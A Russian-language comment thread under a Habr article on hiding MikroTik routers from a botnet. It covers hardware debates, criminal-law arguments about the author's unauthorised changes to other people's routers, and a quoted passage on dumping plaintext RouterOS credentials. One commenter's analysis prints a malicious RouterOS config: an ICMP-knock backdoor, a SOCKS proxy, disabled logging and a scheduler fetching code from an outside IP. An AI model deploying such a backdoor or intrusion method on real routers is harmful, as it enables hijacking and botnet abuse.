Comments 116
Инженерный дизайн устройств — прост как две палки, как следствие, все вопросы решает софт. Именно поэтому — даже простые реализации в среднем бизнесе довольно быстро выталкивают эту марку «за борт» — нагрузки в направлении шифрования VPN или фильтрации траффика ставят «на колени» многие модели этой марки.
Попытки компенсировать установкой деталей большей мощности и объема — дают передышку, но это напоминает увеличение толщины броневого листа на танке, до тех пор пока не появятся кумулятивные заряды.
К тому же покупая один Mikrotik, всегда — это факт, надо брать второй, на случай отказа оборудования и все время вести актуальный лог конфигураций (архив). Не затрагиваю тему SOHO реализаций, т.к. разброс ± очень большой.
Это не ошибка в реализации протокола. Да, на кой хрен было воять свой бинарный православный протокол когда есть \<you name\> — а и черт с ними. Наваяли и ладно. Это конечно с самого начала попахивает бомбой замедленного действия но вдруг прокатит (непрокатило).
Меня удивило то, в каком виде маршрутизатор хранит критически важную информацию. А именно — практически в plain text без шифрования.
Decoding the User Database
Now we can read ANY file from the Router! Which files are useful? In our previous talk on APA3 conference, we talked about just how insecure Mikrotik is, especially when it comes to handling credentials. In short, Mikrotik uses a very weak encoding (no hash and salt) to store passwords to an index file. So it’s entirely possible to download the credential database and extract every username and password stored inside it and that’s exactly what we did for this PoC.
After downloading the idx file, we used another great tool from mikrotik-tools to decrypt the username and password database and dump everything IN PLAIN TEXT !!!
Это было известно разработчикам. Это было известно широкой публике. Последняя разработчиков об этом предупреждала. Мол рано или поздно вам наступит хана. Они судя по всему на это забили большой болт и продолжают хранить информацию в плейне.
Вот этот момент заставляет мой мозг зависнуть. Так просто не может быть! О неверных правах доступа на /etc/shadow с последующим восстановлением паролей из-за кривого крипта и организации атак я впервые читал как минимум лет 20ть назад. Тогда это было популярно. Но черт возьми, господа, на дворе 2018й год! И что, никогда небыло и вот опять? Это с моей точки зрения за пределами добра и зла. Веры тем, кто сегодня сознательно разрабатывают такие системы, нет ровным счетом никакой. Вне зависимости от остальных ТТХ какими бы хорошими они ни были и сколько бы они не стоили.
Так вот: слать непонятно куда пароли в явном виде — дурная затея (это не вэб-сайт, который может быть защищён сертификатом от подмены), а раз так остаётся только вариант хранить пароли и передавать признак знания пароля.
С VPN вообще никакими проблем не наблюдал. Наверное я не правильно что-то делаю.
Актуальный лог конфигурации вести очень не сложно. У меня есть скрипт, который умеет собрать конфигурацию и отправить как вложение на специальный почтовый ящик (gmail к примеру).
По обновлению софта — проверка стоит по планировщику. Тоже скрипт. В случае нахождения обновления софта собирается текущая конфигурация, собирается релиз нотес с обновления и все вместе высылается на почту. После этого можно идти на железку и обновлять ее, точно понимая что конфигурацию ни при каких проблемах не потеряешь.
К сожалению, из Вашего комментария, не могу понять, что из этого списка — mikrotik.com/products установлено, на какое количество соединений в единицу времени, какие типы протоколов и количество/характеристики правил на firewall-e. Нюансов — черт ногу сломит. Потому как если «коробка» за 400 евро спокойно держит 5 человек — такое утверждение имеет место быть.
В целом, считаю, спорить смысла нет. Просто ставим железо, настраиваем и наблюдаем за результатом.
Также стоит отметить сложность логики в настройке устройства, особенно для тех, кто не часто сталкивается с ними.
Канала в интернет ~150Мбит
Пользователей(dhcp): ~ 100 человек + мобильные устройства через точки wifi ~ 50 штук
Правил в фаерволе: 40-50
Тунели(PPTP\l2TP): 3-и постоянных, + около 20 человек могут поднимать для работы из дома.
В среднем нагрузка на CPU в течении рабочего дня 10%
Если сидеть читать почту и просматривать web контент, то 10% слишком много :)
Ладно. Берем это — www.markit.eu/ee/ru/mikrotik-cloud-core-router-ccr1036-8g-2s-router/v2p8038080c150102 или www.markit.eu/ee/ru/watchguard-firebox-m200-high-availability-security-appliance-8/v2p10600071c150802
Причем последний гарантировано тянет 1500 человек (единовременно), канал подключения 300 Мбит/с (выделен только под него, общий канал 1 гбит/с), параллельно в день от 100 до 250 VPN IPSec соединений (удаленные станции и лаптопы пользователей). Вот сколько еще проходит гостевых соединений — не скажу, понятия не имею, вообще это все отдельно висит в невысоком приритете, затычек точно не было :)
На канал в 1 гбит стоит Extreme Networks решение, двойное (единовременно от 3500 до 6000 конечных устройств, количесто соединений — не скажу, врать не буду). Работают в паре, на случай сбоя одного из них. Честно, при таком расладе, ставить Mikrotik — даже в голову не пришло как-то :)
Все свичи либо Extreme, либо Netgear Ent. — пример только одного учереждения, конечно где-то больше, где-то меньше. Но суть статьи — взлом это плохо! Я хочу сказать, это будет в сотни раз хуже, если это решение отвечает еще и за корпоративную инфраструктуру.
В качестве дополнения, обратите внимание, никогда Mikrotik не будет ручаться за производительность устройства с настроеным firewall-ом (UTM, IPS, антивирус — если они конечно у вас есть :) ), все время сноски с пояснением «зависит от конфигурации». Откройте любое руководство Watchguard или Extreme Network, да даже Netgear (тут, справедливости ради, не всегда) — но прописана гарантия скорости, сколько не ковыряй настройки (откровенный хардкор не в счет).
Канализация большая не потому что сейчас много народу сидит на унитазах, а потому, что когда все сядут… то тут получается ситуация несколько иная, потому как пример имеет место быть только в SOHO и small-business.
Нормальный middle и high — всегда работат в пике возможностей.
Всем хорошего дня!
В ваш ценник отлично вписывается CCR1009, у меня он стоит в продакшене в Дата-Центре, обслуживает около 100 клиентов.
На текущий момент 30 000 соединений, 15 IPSec туннелей, 250 правил firewall и 200 правил NAT, не считая Mangle и 3х BGP-сессий, загрузка процессора 25%, загрузка оперативной памяти 28%.
По поводу пропускной способности — не заставляйте меня, вместо вас, лезть в гугл за статьёй, где человек поставил клиенту циску, а у клиента уже были микроты и когда подняли туннели, упёрлись в производительность циски, т.к. не был куплен модуль аппаратного шифрования за 20килорублей, а микроты там стояли 1100, по цене 18к рублей и с распаянными чипами аппаратного шифрования.
Особенно, когда в вашем комментарии, я ни слова не заметил про услугу поддержки железа, которая является категорически важным элементом. Я еще не помню, предприятие, представляющее Mikrotik, которое имело бы, при покупке устройства, SLA по поддержке и обслуживанию.
Составляя проект, в разрезе 3-4 календарных лет, учитываются подобные нюансы, но я вижу, что подобным Вы не занимались. При таком раскладе не преследуется интерес выиграть ничтожное количество денег, в единовременной оплате первичного договора/покупки. А далее что? Надеется, что вам достался именно тот вариант, который без сбоев и брака протянет 10 лет в стойке? Лотерейка?
Я считаю, что Микротик не может быть, по определению, частью цепочки важной инфраструктуры. Я знаю, что все вопросы данное решение делает только за счет ПО и имеет минимальную оптимизацию под то железо, на котором построено. Это факт, почитайте.
Также, я вижу, что недовольны только те, кто не имеет возможности поставить не «бюджетное» решение — но я тут причем? Если вы вынуждены ставить Микротик, а я тут такие вещи говорю — конечно, «минусить» можно, а смысл? Что это даст? Я же не призываю выкинуть его, весь комментарий — метода довести до людей, что при отвественном отношении, экономия при выборе непрофессионального инструмента, в серьезном делопроизводстве, может повлечь расходы — время/деньги.
Если — это не так важно, тогда вообще не понятно — о чем спор?
В конце-концов, я тоже на своей машине с прицепом могу привезти на участок нужное количество земли. НО! Если это сделать на самосвале, то моя экономия денег/времени, что я трачу на загрузку/выгрузку своего прицепа, количества топлива, что потрачено на поездки туда/обратно, на возможный ремонт прицепа/машины после такого пробега — будет оптимальной. Несмотря на то, что за услугу придется платить чуть больше, но — это с экскаватором, фильтрацией земли от камней и здоровой спиной :)
Хорошего дня!
Если говорить про настройку — она сопоставима с CISCO, как, в принципе, и функционал.
По крайней мере потребности сегмента SOHO покрываются с хорошим запасом.
Понятно что рядом с серьезными Blade системами решения микротика будут смотреться не очень уместно, тем не менее возможности железок более чем достойные.
Точно не помню, но и с FreeRadius есть кое-какие затыки (вроде с группами, врать не буду).
Есть ещё вопросы и по бэкапу. Нет, он делается, но ловил себя на том, что не каждый восстанавливается в случае сложной конфигурации. Причём он делался корректно.
Нужна определённая функция? Она есть. Нужна высокая скорость? Нужно, чтобы была аппаратная поддержка в конкретной модели. То же самое с Vlan, фильтрацией и т.п.
То, что каждое устройство может всё, не значит, что все функции стоит настраивать на одном устройстве (в чём, собственно и главная прелесть сети — её отлично можно масштабировать горизонтально). Ну или смириться, что скорость будет далеко не максимально-возможной. И опять же, учиться, учиться и ещё раз учиться — входной порог невысокий, нюансы есть, разной степени важности, и многие дают большой прирост именно по скорости. И при правильной настройке и знании особенностей железа вполне получается выжимать WireSpeed на весьма недорогом оборудовании.
Ну и услышал бы предложенную альтернативу, раз уж… По свичам, например, когда я искал 24 порта с изоляцией — либо UBNT, либо в разы дороже, либо неизвестной стабильности типа level1
«Да, есть железки быстрее и дороже, и, опять же, у Микротика они тоже есть» — вот это и есть отсыл к наращиванию брони.
«о, что каждое устройство может всё, не значит, что все функции стоит настраивать на одном устройстве» — согласен, но когда вы последний раз видели, чтобы покупая в организацию Mikrotik, человек что-то упорно маштабировал? Да почти никогда, в 90% покупают «кухонный комбайн», потому что может :)
«вполне получается выжимать WireSpeed на весьма недорогом оборудовании» — это при относительной небольшой нагрузке со стороны firewall-a (это как один из вариантов).
Насчет альтернатив:
- Aruba/HP, Ruckus (при планировании беспроводных решений)
- Extreme Networks, HP, Cisco, Netgear (свичи, роутинг)
- Fortinet, Watchguard, Cisco (защита)
Ничего экстраординарного. Просто, ожидаю комментария по поводу стоимости, но тогда мы вренемся к пункту «все сразу и за дешево» :)
Ну и минус — железо по большей части у микротика ничерта аппаратно не делает, тот же 750gr3 — натить умеет быстро, гигабит с загрузкой около 40% делает, но не умеет аппаратно vlan и bonding, из-за чего приходится изголяться. В общем и целом — с внешним миром общаться скоростей хватает, а внутри — приходится изголяться, если больше гигбита хочется.
Ещё могу сказать, что микротик 2 года назад, сейчас и 5 лет назад — это совершенно разного уровня продукты. 5 лет назад они были на уровне линксиса с зюкселем, а сейчас их не стыдно со списком выше сравнить (ну да, хуже, кто ж спорит). Да и броня у них такая же, просто она не афишируется)
Ну и как-то очень уж оно Linux-Way…
А что не так с ubnt?
Любой другой логический интерфейс, поднятый через ether1, «из коробки» уже открыт всему миру.

Могу ошибаться по поводу поведения Quick Setup в различных версиях ROS, но во многих случаях правила в nat POSTROUTING и filter INPUT надо было добавлять руками.
Так что, даже если Mikrotik настраивается для применения в качестве домашнего роутера, изменения, внесенные Quick Setup-ом, надо перепроверять, а лучше все правила создавать руками.
Вот прям сразу надо идти на wiki.mikrotik.com/wiki/Manual:Securing_Your_Router
и вдумчиво делать то, что там написано. Другое дело, что им может быть лучше продавать свои роутеры с отключенным и закрытым всем (включая даже доступ для winbox), кроме вебморды c внутренней сети.
Чтобы «сделать настройки в соответствии со своими рекомендациями» необходимо получить удаленный контроль над устройством. Просто так, даже не смотря на то что это добрый микротик, устройство вам его не даст.
Правильно ли я вас понимаю, что вы фактически взламываете устройство используя например феерический CVE-2018-14847 и удаленно изменяете его настройки? Естественно без ведома хозяина устройства.
Если догадка верна у меня только один вопрос: вы не боитесь, что рано или поздно вас могут неправильно понять? С потенциально самыми разными последствиями. Не факт что приятными.
Вот да, мне тоже интересно, о чём думает автор когда мало того, что занимается этим, так ещё и отписывается об этом в статье. Я лично считаю что таким активистам ещё и приплачивать надо, но формально по закону, скорее всего, их можно сажать. И наверняка найдётся какой-нибудь местечковый прокурор, который увидит в этой статье лёгкий способ получить лишнюю "палку" заведя дело на автора.
вмешательство в работу сетей или что? Человек же работать не может
Вы прям все точно про РКН написали :). Но разве кто то что то доказал ?)
Если пользователь попадает в блеклисты на чужом устройстве (не владелец) из-за внешних факторов (политика внешней компании, например).
И если доброжелатель взламывает внутренний роутер, принадлежащий конечному пользователю (владелец).
То есть реального скольжения на данном этапе нет. Автор поста несанкционированно, путём взлома попадает на конечное устройство, которым владеет пользователь и производит на нём махинации.
Статья 272 УК РФ. Неправомерный доступ к компьютерной информации
1. Неправомерный доступ к охраняемой законом компьютерной информации, если это деяние повлекло уничтожение, блокирование, модификацию либо копирование компьютерной информации, —
наказывается штрафом в размере до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до восемнадцати месяцев, либо исправительными работами на срок до одного года, либо ограничением свободы на срок до двух лет, либо принудительными работами на срок до двух лет, либо лишением свободы на тот же срок.
2. То же деяние, причинившее крупный ущерб или совершенное из корыстной заинтересованности, —
наказывается штрафом в размере от ста тысяч до трехсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период от одного года до двух лет, либо исправительными работами на срок от одного года до двух лет, либо ограничением свободы на срок до четырех лет, либо принудительными работами на срок до четырех лет, либо арестом на срок до шести месяцев, либо лишением свободы на тот же срок.
Т.к. оставлен кошелек с просьбой перевода денег и есть факт получения прибыли, то судья вполне может квалифицировать как «корыстную заинтересованность».
P.S. Я сам за то чтобы бороться с уязвимостями, но вот выбранный путь вызывает вопросы.
уничтожение, блокирование, модификацию либо копирование компьютерной информации
Таким образом, даже установка майнера не попадает под статью 272 УК РФ.
К слову, ПО не попадает под определение компьютерной информации, так что обновление прошивки тоже не вменить.
1. Неправомерный доступ к компьютерной информации — это не санкционированное собственником или иным законным пользователем информации проникновение к ней, в том числе с возможностью ознакомления, которое позволяет распоряжаться этой информацией (уничтожать, блокировать, модифицировать и т.д.), и создающее опасность как для самой информации, так и для интересов собственника или иного законного пользователя.
3. Предметом неправомерного доступа к компьютерной информации является охраняемая законом компьютерная информация, под которой понимаются сведения о лицах, предметах, фактах, событиях, явлениях и процессах, находящиеся на машинном носителе, в ЭВМ, системе ЭВМ или их сети.
Модификация — это любая переработка содержания исходной информации (например, введение новых данных, уничтожение части информации в файле и т.п.).
Под копированием компьютерной информации понимается воспроизведение данных при помощи компьютерного устройства с сохранением исходной информации.
Для защиты ПО используется авторское право, но совсем другая история.
Конфиги в общем случае также не защищаются. Исключением являются только случаи, где данные способствуют коммерческой выгоде. Например, логин\пароль для доступа к Интернету, который в свою очередь используется для заработка. А логин\пароль для доступа к роутеру таковыми не являются. Во всяком случае, доказать это будет сложно.
Если интересно, были случаи посадок за смену IMEI на телефоне.
> доказать это будет сложно
… но не очень то и нужно™. Вы думаете судье очень хочется вникать что там в вашем компюктере за пароли? Ей скучно и у неё ещё 30 дел сегодня. Статистику оправданий по уголовным делам сами найдёте.
По хорошему, для дела, тем более уголовного, действительно нужна некая материальная составляющая. Какое-то извлечение прибыли или злонамеренное причинение ущерба. В иных случаях прокурору есть чем ещё заняться.
В нашей стране существует поговорка «Был бы человек, а статья найдётся».
У нас есть статья 272 УК РФ. Но для её применения необходимо доказать преступный умысел.
Вот вы видите, что автомобиль стоит с открытым окном, а на улице осадки. Если вы его накроете полиэтиленом, то к вам нельзя применить даже самоуправство (19.1 КоАП РФ).
Вот я вижу эти открытые окна, закрываю чем могу и пытаюсь сообщить хозяину…
И вот мне интересно, а как тогда работают иследователи в области безопасности, выдавая информацию о количестве поражёных узлов? Их же не сажают пачками?
Но вы не подумали, что если один или несколько из этих сотен тысяч микротиков имеет доступ к себе только за пределами локальной сети и установлен там, где доступ администратора физически затруднён. Своими модификациями вы можете нанести вред или остановить работу какой либо части сети.
Кажется, что в такой сложной области как администрирование чужой сети (а если сравнивать с автомобилем — то выдворение из него бомжа, когда вы увидели что он пытается влезть в чужую, как вам показалось, машину. Или, например, перепарковывать автомобили, взламывая сигнализации, на правильное место, устраняя чужие нарушения) — правильнее будет всеми возможными способами уведомлять владельца, а не заниматься самоуправством?
Всего найдено мною дырявых устройств 179к, из которых я смог «закрыть» только чуть больше 100к. В остальных я боюсь навредить сильнее.
Правильно ли я вас понимаю, что вы анализировали текущий конфиг и если не находили в нём признаков необходимости доступа из вне — закрывали доступ из вне?
Если да, то как вы определяли, что доступ из вне не понадобится в будущем?
Я вижу логическую ловушку в ваших действиях. А учитывая, что вы анализировали такое большое количество устройств и делали это некими эвристиками (явно не в ручную), предположу, что вы не могли предусмотреть все варианты развития событий (хотя бы потому, что вам неизвестны намерения администраторов и их планы по администрированию сети на будущее).
Я бы сильно расстроился, если бы мой маршрутизатор без моего ведома кто-то бы трогал. Даже если этот кто-то мне помог, как ему кажется. Надеюсь, что это всего лишь моя нудная болтовня.
Так соответственно Вы предпочтёте чтобы я его «потрогал» оставив Вам весь его функционал и доступ из локалки или хакер, который заблокироует Вам на него доступ совсем, плюс создаст вирусный трафик?
За всё время мне написало не более 50 человек…а остальные не смогли попасть на свои роутеры и увидеть ваши сообщения)
PS: Ну и уж если вам так хочется поиграть в доброго робинагуда не смотря на возможные последствия — OK. Но делайте это с умом. Что-то глупее, чем трубить о своих подвигах на хабре придумать IMHO сложно. О какой безопасности разговор :-?
В одиночку боретесь с несовершенством этого мира!
У меня нет Микротика, но дыры в софте и даже в железе — это бич современности. Ваши советы распространяются на многие устройства. Принципы защиты те же.
Если закрыть порты, то человек как минимум через mac-winbox может получить доступ к нему.
УК РФ Статья 272. Неправомерный доступ к компьютерной информации
Часть 1 гласит: «Неправомерный доступ к охраняемой законом компьютерной информации, если это деяние повлекло уничтожение, блокирование, модификацию либо копирование компьютерной информации»
Попадаем? Вполне. Охраняемая информация на лицо. Модификация, блокирование — запросто. Замечу — в статье ни слова не сказано о злом или каком-либо ином умысле. Получил неправомерный доступ и пошурудил там палкой? Добро пожаловать на ковер! Как минимум — будем разбираться.
Часть 4 гласит «Деяния, предусмотренные частями первой, второй или третьей настоящей статьи, если они повлекли тяжкие последствия или создали угрозу их наступления,»
Об этом мы поговорим чуть позже. Но не могу не удержаться от «наказываются лишением свободы на срок до семи лет.»
УК РФ Статья 273. Создание, использование и распространение вредоносных компьютерных программ
Часть 1 гласит «Создание, распространение или использование компьютерных программ либо иной компьютерной информации, заведомо предназначенных для несанкционированного уничтожения, блокирования, модификации, копирования компьютерной информации или нейтрализации средств защиты компьютерной информации»
Я не думаю, что автор лечил больных зверят каждого персонально руками. Скорее было нарисовано не суть важно какое ПО, которое сканировало сеть в поисках микротиков, автоматически пробивало их через Феерический Баг (tm), после заходило в управляющий интерфейс (telnet/ssh/web) и выполняло Добро. Это уже, господа, вполне себе попадает под создание и использование программ заведомо предназначенных для несанкционированной модификации.
Часть 3 гласит «Деяния, предусмотренные частями первой или второй настоящей статьи, если они повлекли тяжкие последствия или создали угрозу их наступления, — наказываются лишением свободы на срок до семи лет.». Да. Опять не удержался.
УК РФ Статья 274.1. Неправомерное воздействие на критическую информационную инфраструктуру Российской Федерации
В ней прекрасно Все! Инкапсулированы вышеназванные статьи 273 и 273 но с куда более интересными сроками. Причем тут мы спросите вы? А притом, что
Статья 2. Основные понятия, используемые в настоящем Федеральном законе
6) критическая информационная инфраструктура — объекты критической информационной инфраструктуры, а также сети электросвязи, используемые для организации взаимодействия таких объектов;
7) объекты критической информационной инфраструктуры — информационные системы, информационно-телекоммуникационные сети, автоматизированные системы управления субъектов критической информационной инфраструктуры;
8) субъекты критической информационной инфраструктуры — государственные органы, государственные учреждения, российские юридические лица и (или) индивидуальные предприниматели, которым на праве собственности, аренды или на ином законном основании принадлежат информационные системы, информационно-телекоммуникационные сети, автоматизированные системы управления, функционирующие в сфере здравоохранения, науки, транспорта, связи, энергетики, банковской сфере и иных сферах финансового рынка, топливно-энергетического комплекса, в области атомной энергии, оборонной, ракетно-космической, горнодобывающей, металлургической и химической промышленности, российские юридические лица и (или) индивидуальные предприниматели, которые обеспечивают взаимодействие указанных систем или сетей.
Улавливаете? Любой самый вшивый ФГУП при желании можно притянуть за уши к этому определению.
Выводы… А какие тут выводы? Если с масштабами автор не приврал — IMHO пора менять город, страну, континент и пол. Желающие отплатить вам добром на добро могут прийти с минуты на минуту.
И что вы хотите этим сказать?
Вы уверены, что автор делал это все сидя у себя дома со своего компа? И что писал эту статью тоже оттуда же? То, что он нарушает закон он прекрасно понимает, поэтому и пишет что не может выступить на конференции и сорвать заслуженные апплодисменты, приходится вот так скрываться.
Эмм… Это наверное такой тонкий юмор, да? Оценил.
>> А чего на mum не пустили? В другом городе или места закончились?
> 1. Я в Сибири, а МУМ в Москве
> 2. Я не так давно сменил работу и на отпуск ещё не заработал
> 3. Работодателю пофиг на микротик, чтобы просить командировку.
Вот представьте банальная ситуация. Робин Гуд ошибся и принес добро не туда. В результате он оставил систему X без внешнего управления. С его точки зрения это добро. Однако с точки зрения горе-админа[ов] системы — это большое зло т.к. система перестала работать. К тому же Робин помимо самого добра ещё и накосячил в процессе. Не специально конечно. Но тем не менее. Система не то, чтобы сильно важная но вполне может поднять волну. Я не просто так привел статью 274.1.
Админам, как крайним, конкретно прилетело по шапке. И это только начало. Они, не будучи дураками, стараются прикрыть свой зад. Им глубоко плевать на Робина, его идеи, пасхалки и всю остальную хрень. Сейчас им интересен повторюсь только свой, личный зад. Как следствие все версии сводятся к внешнему вражескому вторжению. Начинают искать виновного. Поднимают все возможные логи. Естественно находят следы Робина. Проводят консультации с людьми в теме. Обнаруживается, что Робин уже успел засветиться ещё на N-м количестве хонепотов т.к. нес добро всем без разбору. Коррелирующие друг с другом данные накапливаются. Круг сужается. А потом кто-то обнаруживает подарочек на хабре в виде этой заметки. Твоюжмать да так не бывает! Робин, ты? Пробивают. А что — похож. Вот… молодец. Ну иди сюда. Обсудим.
Если у Робина карма так себе то будет именно так, как я описал выше. Не верите? Ваше право. Видимо, истории с провалом реальных злоумышленников ничему вас не учат. Обязательно нужно все проверить на своей шкуре. А жаль. Учитывая заявленный масштаб вероятность попасть не в то место и не в то время отнюдь не нулевая.
PS: Выраженные же Робину респект и подбадривающие улюлюканья кулхацкеров никак не помогут. В тот момент у него будут совсем другие проблемы. Останется только сокрушаться над собственной глупостью.
PPS: Тем же, кто совсем не верит и не читает новостей — описанный выше сценарий я практически списал с Mirai (ссылка тоже откуда то с Хабра). Почитайте на досуге не пожалеете. Триллер хоть куда. Конечно, масштабы не те, мотивы отличаются. Но развитие событий более чем реальное. Пацаны из Mirai это знают как никто другой.
Но я так и не понял, почему вы так переживаете за автора
За автора я не переживаю. Мавр свое дело сделал, Мавру остается только ждать и молиться. Я хочу разбавить восторженный восторг реалистичностью. Чтобы те, кто это молча читают, задумались и не повторяли в будущем чужих дурацких ошибок.
Автору респект!
Поделитесь вашим опытом как ещё хакеры могут использовать Mikrotik.
Ещё можно поднимать виртуальные серверы metarouter, заливать туда урезанный Линукс, и он уже спокойно ходит на CC сервер, получает задание например на ddos и льёт весь доступный канал. Для целей ddos, будь я злоумышленником, то точно не использовал socks/vpn или даже dns amplifier. Можете проверить, много ли стоит metarouterов? И ведь если там Линукс, он имеет полный доступ к локальной сети, и к тому же mikrotik-у изнутри, если ещё не сменился пароль и. Администратора.
Так же загляните в Environment
Так быть не должно
Есть определенные сомнения, что наличие окружения связано со взломом операционной системы. Подтвердите или опровергните свою теорию.
Свой вариант
Сам ломал роутер Mikrotik через недавнюю уязвимость, так как человек который знал пароль давно уволился, а было необходимо внести изменения в конфигурацию. Взломал, настроил, обновил, пароль передал владельцу роутера.
Вспомнился Max Butler, который на заре хакерской карьеры аналогичным образом чинил людям уязвимые инстансы BIND :)
Делали в офисе WiFi сеть из двух микротиков, в итоге она то работает, то нет. Долго пытались понять, пришли к тому что что-то с прошивкой. В итоге плюнули и купили другое оборудование.
Вообщем по мне так проблемма в том что софту, что внутри крутится не уделяют нужного внимания.
Гм, мой dhcp сервер, который стоит на бридже wan-tv (знаю, дико звучит, но без этого tv приставка не работает), последнее время стал выдавать айпишники на какие-то левые mac адреса. Интересно, не автор ли это случаем был? При этом фаерволл настроен, активность с этого бриджа разрешена только tv приставке. Интернет поднимается через l2pt с этого бриджа. Ничего в голову не приходит, как с этим бороться и как посмотреть активность с этих адресов.
Я скажу так: проблема не в роутерах MikroTik, а в самих владельцах этих роутеров, а также в недостаточной компетенции настройщиков и отсутствие единых стандартов.
Свой вариант
Открыл 22 наружу. По глупости и по ТЗ. Юзвери пожаловались на медленный вифи. Снаружи подключиться не смог, приехал на точку, подключился, увидел в логах вагон попыток подключиться к 22-му порту. Точка тупо ушла в DoS, но пароль подобрать не успели. Сменил порт и ограничил белый список и было мне счастье. Было это еще в 2012-м.
Молодец, человек. Всё правильно делает.
#В этом разделе добавляются все локальные сети всех интерфейсов на микротике в список allow-ip
/ip firewall address-list
add address=192.168.1.0/24 list=allow-ip
#Здесь в файрволе выключаются все правила с action DROP и в начале вставляются пять правил. Я их пронумеровал и прокоментировал
# 1. action=Tarpit — создаёт соединение, но не разрешает его, держит в памяти, позволяет флудом на порт 30553 исчерпать оперативку роутера
# 2. Здесь, если злоумышленник постучится пакетом ICMP с размером пакета 1083 байта, вносит себя в список описанный в начале «allow-ip», и где тут «I closed the vulnerability with a firewall»
# 3. Разрешает ВСЁ всем кто в списке allow-ip
# 4. Закрывает возможность сделать буфер оверфлоу по UDP DNS кому то ещё. Злоумышленник не хочет делится добычей.
# 5. Блокируются некоторые порты TCP локальных сервисов роутера, злоумышленник опять не хочет делится добычей с другими злоумышлениками
/ip firewall filter
1.add action=tarpit chain=input comment=«Add you ip addess to allow-ip in Address Lists.» dst-port=30553 protocol=tcp
2.add action=add-src-to-address-list address-list=allow-ip address-list-timeout=1h chain=input comment=«I closed the vulnerability with a firewall.» packet-size=1083 protocol=icmp
3.add action=accept chain=input comment=«Please update RouterOS and change password.» src-address-list=allow-ip
4.add action=drop chain=input comment=" You can say thanks on the WebMoney Z399578297824" dst-port=53 protocol=udp
5.add action=drop chain=input comment=«or BTC 14qiYkk3nUgsdqQawiMLC1bUGDZWHowix1» dst-port=53,8728,8729,21,22,23,80,443,8291 protocol=tcp
#disabled all drop rules
# Ниже включается сервис socks, через который коммуницирует вся бот сеть. Около 10 000 роутеров ломится по этому порту ко мне до сих пор но с меньшей интенсивностью. Заметте, этот порт TCP 4145 не блочится файрволом.
/ip socks
set enabled=yes port=4145
# Выключается весь лог, чтобы владелец не узнал о произошедшем как можно дольше, и чтобы мониторинг ничего не сказал.
/system logging
set 0 disabled=yes
set 1 disabled=yes
set 2 disabled=yes
set 3 disabled=yes
# deleted all entries
# Тут нет никакого телеграмма или обратной связи, но адреса кошельков совпадают с теми что в статье.
/system note
set note=«I closed the vulnerability with a firewall. Please update RouterOS. You can say thanks on the WebMoney Z399578297824 or BTC 14qiYkk3nUgsdqQawiMLC1bUGDZWHowix1»
# Здесь скрипт и его шедулер для запуска каждые 30 секунд или сразу после ребута, скриптов, что подкладываются в файл mikrotik.php на сервере 95.154.216.164
/system scheduler
add interval=30s name=schedule3_ on-event=script3_ policy=ftp,reboot,read,write,policy,test,password,sensitive start-time=startup
/system script
add name=script3_ policy=ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http"
P.S.: Вы пишите что вырвали из лап ботнета 100 000 устройств, но не приводите пример как именно это делаете. Вы приводите пример что защитили устройство пасхалкой, но эта пасхалка сама по себе зло, которое я описал выше, и появляется вместе со всем остальным кодом выше, что и есть бот сеть. В статье много нестыковок для того, кто столкнулся с проблемой лично. Вы либо плагиатите, поскольку адреса кошельков совпадают и вы утверждаете что они ваши, либо вы и есть злоумышленник, который притворяется что делает добро.
P.S.S: Роутер был настроен по принципу запрещено всё, что явно не разрешено. Пользователь на роутере был один со сгенерированным паролем, что означает что доступ был получен не подбором пароля, а через уязвимость нулевого дня. Возможность была по моему мнению одна — через прокси сервис, который был включён по белому списку только разрешенным клиентам по адрес-листу, компьютер одного из которых я подозреваю был заражен. Процедура взлома здесь нетривиальная, и я считаю разработчика этой бот сети высококлассным специалистом. Однако, в статье ни малейших примеров или намёков о методе получении доступа, и какую дыру автор призывает закрывать.
Статья 2018 года и последние действия в "чужих" микротиках были именно в тот период. С тех времён я утратил интерес к теме изучения мира микротиков.
Я делал только то, что описано в статье.
/ip socks set enabled=no
То есть сокет выключался.
Не надо мне приписывать чужие достижения...Если какой-то метод проникновения не описан в этой статье, то я его тогда и не обнаружил, а значит хакеры могли продолжать им пользоваться. Я не гений, чтобы знать всё...
С Ваших слов Вас взломали в августе, как я понимаю, 2022 года, то есть 4 года спустя... Вероятно, моя защита, вполне работала эти 4 года.
Почему Вы думаете, что за это время хакеры не смогли найти новую дырку в системе?Какую именно уязвимость я закрывал? Вы читали мою статью по диагонали... В самом начала стоит отсылка к моей предыдущей статье:
Ещё в мае 2018 я писал статью с рекомендациями как защитить свой Микротик.
В ней уже была отсылка на первоисточник.Так же в моей версии, которую я раскатывал, была ссылка на официальный форум микротик с описанием уязвимости.
Для чего хакерам Микротик и как я спрятал 100 тыс. RouterOS от ботнета